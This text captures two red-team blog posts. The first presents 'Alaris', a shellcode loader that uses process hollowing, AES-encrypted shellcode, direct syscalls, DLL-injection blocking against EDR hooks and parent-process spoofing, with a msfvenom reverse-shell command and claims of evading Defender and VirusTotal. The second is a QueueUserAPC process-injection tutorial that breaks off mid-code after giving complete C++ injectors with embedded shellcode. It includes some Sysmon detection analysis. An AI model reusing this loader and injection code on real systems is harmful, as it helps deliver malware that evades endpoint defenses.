Reading view

There are new articles available, click to refresh the page.

Alaris | A Protective Loader

14 October 2020 at 23:35

Sevro Security
Alaris | A Protective Loader

To date, we’ve reviewed techniques such as shellcode loading and encryption, circumventing detection, and building in our own syscalls.

Today, I’m releasing Alaris, a new shellcode loader that will utilize many of the previous techniques discussed within this blog as well as add a few new ones. We’re going to use known and widely used tactics that I, and many other Red Teams, have been using for a while. The best documentation (easiest to digest and implement) on many of these TTPs is available on ired.team. I will include documentation/links everywhere in this post.

The primary goal of this loader is proactive protection and self-sufficiency. I want to rely mostly on the code we write for the heavy (malicious) lifting. With that said, I am still going to use extraordinarily helpful libraries such as windows.h and vectors. However, the more self-sufficient we become and the lower we execute our code, the less noise we make and that’s a damn good thing as seen within the detection portion of this post.

Overview

In efforts to help mitigate any issues on your end, here are my development environment specifics.

System: Windows 10 (Build 17763)
IDE: Visual Studio 2019
Language: C, C++, x86 ASM (VS19 Project is Visual C++)
- Loader.cpp – Shellcode Loader
- Cryptor.cpp – Shellcode Encryption

Alaris is a shellcode loading application utilizing the Process Hollowing technique. There are going to be two (2) distinct processes that we’ll start and analyze. In the graphic below I detail both of the processes where Red is the loader process and Green is the hollowed (child) process.

The Parent Process [loader.exe]: This is the process that is going to decode, decrypt, and add the shellcode to a hollowed process.
1. Shellcode decryption via aes.c (AES -CBC 256)
2. Shellcode decoding via base64.cpp
3. Direct x86 Syscalls via low.asm (Thanks to SysWhipers) using NtQueueApcThread()to add shellcode.
4. Disallow non-Microsoft signed DLL’s from injecting into process.
The Hollowed (Child) Process [mobsync.exe]:The CreateProcess()Child process. We’re using mobsync.exe here but there are many different executables you can use.
1. Disallow non-Microsoft signed DLL’s from injecting into process.
2. Parent Process ID spoofing to explorer.exe

Protecting Our Malware

There are several tactics we’re using to not only protect our initial execution but also our child (hollowed) process. Let’s go through each of them at a pretty high level.

Shellcode Encryption

Within this loader is an embedded AES (128, 192, 256) (ECB, CTR, CBC) implementation. Not relying on Windows Crypto API’s or known libraries, such as Crypto++, helps limit our noise and overall footprint.

We’re encrypting our shellcode with AES-CBC 256. The key and iv live in the code and are not obfuscated, encoded, etc. The primary purpose of encrypting our shellcode is to defeat static signature based detection (i.e., \xFC\xE8, \xFC\x48). We’re not going to bypass entropy detection or the good job Windows Defender does at analyzing large Base64 blobs with high entropy. However, if we used a staged payload or a small payload, we can circumvent most EDR systems simply by encrypting our shellcode.

All Shellcode encryption is done via Cryptor.exe which, is part of the Visual Studio project.

Direct x86 Syscalls

Direct Syscalls allow us to mitigate using ntdll.dll for a large majority of the process hollowing. We’re executing the syscalls ourselves via x86 assembly located in low.asm and as such, we’re staying quieter and executing our code at a lower level. This significantly decreases the likelihood of detection.

I’ve gone pretty deep into direct x86 Syscalls for Process Injection using both CreateRemoteThread() and QueueUserAPC() in these two posts:

Preventing 3rd Party DLLs from Injecting into your Malware

We’re blocking all non-Microsoft DLL’s (i.e.,DLL’s that have not been signed my Microsoft) from hooking/injecting into our process (Both the Parent and Child). Keep in mind, there are a few EDR solutions out there that have co-signed drivers (Company + Microsoft). To get a better understanding on how this works and why, I would suggest reading iread.team’s write up.

// Disallow non-microsoft signed DLL's from hooking/injecting into our CreateProcess():
InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &size);
DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(policy), NULL, NULL);

// Disallow non-MSFT signed DLL's from injecting
PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY sp = {};
sp.MicrosoftSignedOnly = 1;
SetProcessMitigationPolicy(ProcessSignaturePolicy, &sp, sizeof(sp));

PPID Spoofing

We’re spoofing the parent process ID of our child process (hollowed process). We want to make it look like this process was spawned organically (explorer.exe -> mobsync.exe) rather than the true path of execution (loader.exe -> mobsync.exe).

This is a fairly simple technique that I find is more fun for the Blue Team to find than it is really helping me to be sneaky. However, it’s still a bit sneaky considering at first glance, it does look like our execution path is not suspect and may blow past the radar of some teams.

Overwrite Shellcode

This is not full proof and will not stop many Blue Teams from dumping your shellcode if they get a hold of your binary. This is simply a cleanup method to remove your shellcode from memory as good measure.

Alaris Build & Execution

Let’s walk through the build and execution path from start to shell. I’ve generated a simple reverse shell with msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -f raw >> 64b_443_localhost_revshell.bin

Building

Included in this package is a cryptor. To encrypt, simply build the Visual Studio project as-is and execute cryptor.exe with the path of a raw (binary) shellcode file.

λ cryptor.exe
Usage:  cryptor.exe <payload.bin>
Example cryptor.exe C:\Users\admin\shellcode.bin

λ cryptor.exe ..\..\..\test\64b_443_localhost_revshell.bin
[i] Replace shellcode string in loader with one below:

shellcode = "z33lrIYAG7pcIAZfrX7cRKLyNwr1w+zD1pSGQXA/0emhQBn2C1z5SjOjyGu5FL2Wrq3xADX+MDyaZs/F8BIBXcqPK1TFdESehzl8uO8+NT+Mda0BjZSGUcd0qs3PO4klwSOhSDrlTUhjCe9+7QoaFc8g0yTIGiAP674VA6URsKd9y0szNTBgSgn/L6gB2WpfGQ4UBaHGDiQ8GwrzedHh/eTbhZtS2/9HEoVqkoAqG2gts1rWt4ckzvEJRM8v4zJxLzMEtNnf3e9TBaG1CNfWCWg+SPIfW2L6SLUA16EadwwSihhKk84KGQyTEgQ9Ue1/VMt30TREUC46P3IvidPVG6LgIQs5pHXYEPPBBV2vCufLCQ3F6ChFwMhZJvzRF/30P6+POoyFAMHvwSrebSGiliwWgrqcAvRPuWxcu3T5DdqEXoDzESk75W8n4kGZWI3cgiVvDpTt3vFST2gdW7j2ri75T0P5Ut1HWAxGr75ir68RX4HB8Mli78eP6UcLuFHULrz5W0tpA3yyefUapF7mK+gGbuFZ6pyLRrkG2XWLmo1Ji1/2yGzuHQ0Q4HacssCuN/peqkKbm++unMiu/D3lGlH2KGdCBhBEubVULKFFvZ0=";

Replace the shellcode variable in the main function of loader.cpp with the new shellcode variable generated by cryptor.exe
Build a Release version.

Execution

I’m using Process Hacker to review both the Parent and Child (hollowed) processes. Let’s fist take a look at the Parent process attributes.

The image below shows details of the loader.exe process. We can verify that our DLL Signature requirement, which disallows all non-Microsoft signed DLL’s from injecting into our process, is enabled.

Moving into the mobsync.exe process generated by our CreateProcess() call we can verify that the PPID is in-fact explorer.exe due to our spoofing and we have 3rd party DLL injection blocking similar to loader.exe.

EDR Bypass and Detection Analysis

I generated two (2) Alaris loaders with different MSFVenom payloads:

loader_rev.exe – Compiled with a reverse shell (127.0.0.1:443)
loader_notepad.exe – Compiled with shellcode that executes notepad.exe

Sysmon Events

Sysmon generated five (5) events during loader_rev.exe execution. We do not see suspect process injection events due to us using NtQueueUserAPC(). If we were to use NtCreateRemoteThread(), we would see a Sysmon Event Type 8.

There are two (2) process creates. One for Loader and the other for modsync.exe executing the shellcode.

The interesting thing here is that the second Process Create does not explicitly call out mobsync.exe being executed. Instead, it detailed mobsync.exe as being the parent process and shows the shellcode executed via cmd within the CommandLine field. This must be a byproduct of the process hollowing but, I am not 100% on why just yet.

Bypassing Defender

Executing loader_notepad.exe on a updated and fully patched Windows 10 system did not result in any detection’s from Defender. The results were identical with loader_rev.exe.

Virus Total

I tested both versions of Alaris against Virus Total to get a better idea on the overall detection / suspect percentage and did not have any. This is possibly a symptom of not having common indicators such as a URI string or an IP address (other than 127.0.0.1) embedded in either the shellcode or the source.

Detection

Alaris

Alaris Yara Rule

Tactics

Conclusion

The TTPs used within Alaris are common among Red Teams and used within several C2 frameworks (Cobalt Strike for example). Alaris is a simple and small example of how you can customize these tactics to circumvent several different detection mechanisms as well as make your code look more “legitimate” in the context of Microsoft applications.

Alaris | A Protective Loader
Joshua

Process Injection Part 2 | QueueUserAPC()

Sevro Security

Joshua

13 April 2020 at 18:09

Sevro Security
Process Injection Part 2 | QueueUserAPC()

In the first process injection post, we talked about CreateRemoteThread() which, is the vanilla method of process injection that most threat actors use considering its simplicity and reliability. Today we’re going to look at QueueUserAPC which takes advantage of the asynchronous procedure call to queue a specific thread. This API has several benefits in which the most appreciated is its ability to circumvent Sysmon.

This post will be broken down into four (4) parts:

Process Injection Primer – Subject to the injection technique, we will review how this type of injection works programmatically.
Analyze High Level Windows API Calls – Use the MSDN Documented methods and functions.
- API Call Analysis
- Sysmon events and logging
Analyze Medium Level Windows Syscalls Using LoadLibrary – Use the NTAPI Undocumented functions via ntdll.dll
- API Call Analysis
- Sysmon events and logging
Analyze Low Level Windows Syscalls Using x86 Assembly – Custom via Rolling Our Own Syscalls
- API Call Analysis
- Sysmon events and logging

In concerns with the Sysmon Analysis, I am using same Sysmon Config as part 1 with one slight adjustment. Considering QueueUserAPC() will bypass Sysmon detection, I have expanded the Processes Accessed (Event ID 10) parameters based off of ion-storm’s configuration. With this event, we can detail the specifics of the injection without actually seeing an event (correlational).

Before we go any deeper, let me define what I mean when I say High, Medium, and Low level API’s:

High-Level API – This is the MSDN (proper/safe) method of execution. In other words, if you were a developer, and you needed to use these functions legitimately, you would use the MSDN documentation to accomplish your goal. These functions are High-Level because they are translated by the OS to Medium/Low level functions and instructions. This is done for several reasons the most important of which is ease of development.
Medium-Level API – The OS maps High-Level API calls to Lower-Level API Calls (which in the context of this post we’re calling medium-level). For our purposes, a large majority of those calls live within ntdll.dll and kernel32.dll. We get the “Medium-Level” by cutting out the middle man (The OS) and calling the Low-Level API Calls ourselves. The reason I call it Medium is that we are still using dlls that live on the Windows OS and when we map and call functions from those dlls the OS, and other system monitoring software, can still see those calls.
Low-Level API – The “Low-Level” is defined by rolling our own everything! We do not use ntdll.dll or kernel32.dll to accomplish our process injection (i.e., we do not map any functions). In this case, we have a custom x86 assembly file (custom.asm) and a corresponding header file (custom.h). These files map direct syscall functions in order to circumvent both the High and Medium level API’s (essentially). Regarding the process injection, we do not load external resources or rely on any OS translation, we do it ourselves.

All source code is written in C++ or x86 ASM. For continuity, I will be compiling all my builds for x64 bit architectures.

Reference Material

MSDN Documentation for all High-Level API calls.
- SuspendThread
- VirtualAllocEx
- WriteProcessMemory
- QueueUserAPC
- ResumeThread

NTAPI Undocumented Functions for all Low-Level API Calls.
- NtSuspendThread
- NtAllocateVirtualMemory
- NtWriteVirtualMemory
- NtQueueApcThread
- NtResumeThread

Tools
- Sysmon: For the Sysmon Analysis portion, I am using SwiftOnSecurity’s Sysmon Configuration for basic analysis. This is a great Starter configuration that should be amended/changed to meet your organizations threat model/need. A good example as to what can be done with Swift’s stock configuration is one that ion-storm developed.
- API Monitor: We look use this tool to review the true API calls for all levels of API’s.
- Process Hacker: A great to for analyzing processes in general.
- Procmon: Similar to Process Hacker but with some more advanced features such as determining API calls from user to kernel land.
- SysWhispers: @Jackson_T’s python tool that generates x86 ASM that can be directly imported into your C++ Project.

Process Injection Primer

QueueUserAPC is an Asynchronous Procedure Call. Let’s break down what the means:

Asynchronous – not simultaneous or concurrent in time.
Procedure Call – The details of a specific, singular, procedure. In our example, it’s the shellcode that will execute notepad.exe.

This means a few things. First, since it’s asynchronous we need to be able to pause/suspend the thread that is going to execute our shellcode (i.e., we cannot have the thread running when we give it a procedure). Second, we need to open the thread (OpenThread()) and assign it a procedure. Last, we need to resume the thread to obtain code execution.

In the examples to follow, I generate a nslookup.exe process in the C++ code to which I then inject the shellcode into. However, an attacker may want to be more dynamic with their injection. There are really three ways to go about QueueUserAPC Injection:

Start a suspended process (CreateProcess()), inject into it, resume threads.
Have a predefined process name (such as explorer.exe) that we know is going to be running on system, enumerate processes for PID’s, enumerate the threads of the selected PID, suspend the threads, inject shellcode, resume threads.
1. I have provided an example below within the Real World Example section.
Have a list/array of predefined process names that the code will enumerate if said process is running, enumerate processes for PID’s, enumerate the threads of the selected PID, suspend the threads, inject shellcode, resume threads.

VirtualAllocEx() → WriteProcessMemory()

Just like CreateRemoteThread(), we allocate memory in the external processes’ memory space and write our shellcode to that newly allocated space.

QueueUserAPC() Process Injection - writing memory

SuspendThread()

NOTE: In the examples to come, I create a process in a Suspended state however, if you have selected an already running process you will have to manually enumerate the Threads associated with the process and suspend the threads you are going to inject into. I say this because you will not see the OpenProcess() or SuspendThread() API call in my code.

Once a process has been selected and you have the thread id’s, you can suspend all or a single thread with the SuspendThread() API call. In a debugger, I have generated a nslookup.exe process in a suspended state. We can look at the process in Process Hacker to verify that our thread is in-fact suspended.

QueueUserAPC() Process Injection - suspending threads

QueueUserAPC() → ResumeThread()

We assign the procedure call (execute the shellcode) to the nslookup.exe suspended thread via QueueUserAPC() API. Next, we resume the thread to move the threads state from Wait:Suspended to Running. Once the thread starts, it will execute the procedure call (our shellcode) and terminate itself.

High Level API

#include <iostream>
#include <Windows.h>

int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE 
        CREATE_SUSPENDED |              // Create Suspended for APC Injection
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure (removed extra parentheses)
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 2000); // Allow nslookup 1 second to start/initialize. 
    hProcess = pi.hProcess;
    hThread = pi.hThread;

    // Allocation Memory and Write shellcode to the allocated buffer
    allocation_start = VirtualAllocEx(hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, allocation_start, shellcode, allocation_size, NULL);

    // Inject into the suspended thread.
    PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)allocation_start;
    //hThread = OpenThread(THREAD_ALL_ACCESS, TRUE, pi.dwThreadId); // <-- Open a Thread if needed
    QueueUserAPC((PAPCFUNC)apcRoutine, hThread, NULL);

    // Resume the suspended thread
    ResumeThread(hThread);
    
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Number of API Calls	174
Total Amount of Memory Used	116 KB

QueueUserAPC() Process Injection - High Level API Analysis

We’ve mapped each API call during the High Level API execution flow. We can easily distinguish the High Level API to Low Level API functions that the OS translates during runtime (i.e., VirtualAllocEx → NtAllocateVirtualMemory) This is an important point of interest as it’s common practice for AV / EDR systems to hook these API calls prior to them being handed off to the Windows Kernel to execute a syscall. Our goal is to go lower and therefore avoid such hooks.

Sysmon Analysis

Sysmon is unable to detect process injection via QueueUserAPC(). This is, from my limited understanding, because we are not creating a new thread within the victim process. We are enumerating the threads the process has instantiated, opening the thread, suspending it, giving it a procedure call (our shellcode), and resuming the thread. We are simply accessing a process and telling it to execute some procedure which, is a bit less invasive.

Looking at the image above, we have keyed in on Sysmon Event ID 10: Process Accessed. During our injection, we do request access to a process via the OpenProcess() or NtOpenProcess(). My example does not open a process to access it since I have used CreateProcess() for demonstration purposes. However, We still can see that Sysmon has detected that the program PI_QUA_High_Level.exe has accessed C:\Windows\System32\nslookup.exe. The interesting part is that Sysmon records a full Call Trace for the event. This could possibly be used for heuristic detection.

Medium Level API

Let’s move a bit lower this time. As stated in the beginning of this post, the designation Medium Level API is simply my nomenclature which means we are avoiding the OS translation and are going to map/call the Nt* functions directly.

#include <iostream>
#include <Windows.h>

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _PS_ATTRIBUTE
{
    ULONG  Attribute;
    SIZE_T Size;
    union
    {
        ULONG Value;
        PVOID ValuePtr;
    } u1;
    PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST
{
    SIZE_T       TotalLength;
    PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _CLIENT_ID
{
    void* UniqueProcess;
    void* UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

typedef struct _IO_STATUS_BLOCK
{
    union
    {
        NTSTATUS Status;
        VOID* Pointer;
    };
    ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;

typedef VOID(NTAPI* PIO_APC_ROUTINE) (
    IN PVOID            ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG            Reserved);

typedef NTSTATUS(NTAPI* pNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
typedef NTSTATUS(NTAPI* pNtOpenThread)(PHANDLE ThreadHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID);
typedef NTSTATUS(NTAPI* pNtSuspendThread)(HANDLE ThreadHandle, PULONG SuspendCount);
typedef NTSTATUS(NTAPI* pNtAlertResumeThread)(HANDLE ThreadHandle, PULONG SuspendCount);
typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect);
typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten);
typedef NTSTATUS(NTAPI* pNtQueueApcThread)(HANDLE ThreadHandle, PIO_APC_ROUTINE ApcRoutine, PVOID ApcRoutineContext OPTIONAL, PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL, ULONG ApcReserved OPTIONAL);


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE 
        CREATE_SUSPENDED |              // Create Suspended for APC Injection
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure (removed extra parentheses)
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 
    hProcess = pi.hProcess;
    hThread = pi.hThread;
    
    // MEDIUM LEVEL API:
    // Stole Some Code From --> https://github.com/uvbs/NT-APC-Injector
    FARPROC fpAddresses[6] = {
        GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtWriteVirtualMemory"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSuspendThread"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAlertResumeThread"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueueApcThread")
    };

    // setup for NTAPI functions
    pNtAllocateVirtualMemory fNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)fpAddresses[1];
    pNtWriteVirtualMemory fNtWriteVirtualMemory = (pNtWriteVirtualMemory)fpAddresses[2];
    pNtSuspendThread fNtSuspendThread = (pNtSuspendThread)fpAddresses[3];
    pNtAlertResumeThread fNtAlertResumeThread = (pNtAlertResumeThread)fpAddresses[4];
    pNtQueueApcThread fNtQueueApcThread = (pNtQueueApcThread)fpAddresses[5];

    allocation_start = nullptr;
    fNtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    fNtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
    fNtQueueApcThread(hThread, (PIO_APC_ROUTINE)allocation_start, allocation_start, NULL, NULL);
    fNtAlertResumeThread(hThread, NULL);
    
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Number of API Calls	199
Total Amount of Memory Used	127 KB

QueueUserAPC() Process Injection - Medium Level API Analysis

The total number of API calls was 199 which is much larger than the High Level API’s 174 Calls. That’s pretty noisy but, not unexpected considering the total number of functions that we needed to map from ntdll.dll and kernel32.dll. This does create a lot of overall events that are not necessary if we were to map the functions within a custom implementation which, is what we are going to do within the Low Level API.

One thing that I would find very interesting is to analyze valid implementations for QueueUserAPC and determine if the sample above can easily be defined malicious subject to Call activity alone.

Overall, though, we did decrease the High Level API calls regarding the injection itself which, is a step in the right direction.

Sysmon Analysis

As expected, any indication of process injection has not been defined by Sysmon. Similar to the High Level code, we were able to distinguish which processes were accessed with details containing the Call Trace. Again, this could be very helpful to a RE or triage analyst who is responding to a possible compromise.

Low Level API

#include <iostream>
#include <Windows.h>
#include "common.h"


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE 
        CREATE_SUSPENDED |              // Create Suspended for APC Injection
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure (removed extra parentheses)
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 
    hProcess = pi.hProcess;
    hThread = pi.hThread;

    // LOW LEVEL API:
    allocation_start = nullptr;
